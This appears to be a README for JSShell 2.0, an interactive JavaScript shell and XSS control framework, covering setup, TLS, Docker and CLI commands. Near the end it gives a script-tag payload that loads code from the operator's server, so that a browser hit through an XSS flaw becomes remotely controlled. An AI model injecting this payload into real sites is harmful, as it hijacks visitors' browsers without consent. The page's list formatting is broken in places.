An interactive multi-user web based javascript shell. It was initially created in order to debug remote esoteric browsers during experiments and research. This tool can be easily attached to XSS (Cross Site Scripting) payload to achieve browser remote code execution (similar to the BeeF framework).
Version 2.0 is created entirely from scratch, introducing new exciting features, stability and maintainability.
<script>
tagsIn the resources
directory, update the config.json
file with your desired configuration:
docker
deployment method, choose the database host as db
shell.js
file does some AJAX calls to register and pollhttp[s]://{YOUR_SERVER_IP}:{PORT}
.Now JSShell supports TLS, which means you can now generate TLS certificates and feed them to the web server.
The web server will infer the domain name from the config.json
file. In order to create the certificate,
use the create_cert.py
script in the scripts
folder:
$ cd scripts
$ python create_cert.py --domain <YOUR_DOMAIN> --email <YOUR_EMAIL>
Please note that the web server must be down in order for the script to function properly. At this point, we have successfully generated our certificates! The sole modifications we need to do are:
config.json
file, change the schema of the URL
field to https
.docker-compose.yml
file change the exposed port of the web
container to 443
.This new version supports installing and running JSShell via docker
and docker-compose
. Now, to install and run the
entire JSShell framework, simply run:
$ ./scripts/start_docker_shell.sh
This will:
JSShell
command line interface containerIf you still want to use the old fashion method of installing, simply make sure you have a MongoDB
database up and running, and update the config.json
file residing in the resources
directory.
I recommend using a virtual environment with pyenv
:
$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv
Or using virtualenv
:
$ virtualenv -p python3.6 venv
$ source venv/bin/activate
Then, install the requirements:
$ pip install -r requirements.txt
If you used the docker
method, there's no need to run the following procedure.
Otherwise, once we have the database setup, we need to start the web API server. To do, run:
$ python manage.py web
This will create and run a web server that listens to incoming connections and serves our JSShell code.
Now to start the JSShell CLI, run the same script but now with the shell
flag:
$ python manage.py shell
After setup and running the required components, enter the help
command to see the available commands:
2.0
by @Daniel_Abeles
>> help
Documented commands (type help <topic>):
General Commands
--------------------------------------------------------------------------------
edit Edit a file in a text editor
help List available commands or provide detailed help for a specific command
history View, run, edit, save, or clear previously entered commands
ipy Enter an interactive IPython shell
py Invoke Python command or shell
quit Exit this application
Shell Based Operations
--------------------------------------------------------------------------------
back Un-select the current selected client
clients List and control the clients that have registered to our system
commands Show the executed commands on the selected client
dump Dumps a command to the disk
execute Execute commands on the selected client
select Select a client as the current client
>>
JSShell supports 2 methods of operation:
Similar to other XSS control frameworks (like BeeF), JSShell is capable of managing successful XSS exploitations.
In example, if you can inject a script
tag, inject the following resource to your payload, and a new client will
appear in your console:
<script src="http[s]://{YOUR_SERVER_IP}:{PORT}/content/js"></script>
If you desire to debug exotic and esoteric browsers, you can simply navigate to http[s]://{YOUR_SERVER_IP}:{PORT}/
and
a new client will pop up into your JSShell CLI client. Now it is debuggable via our JSShell console.
Canop for JSON.prune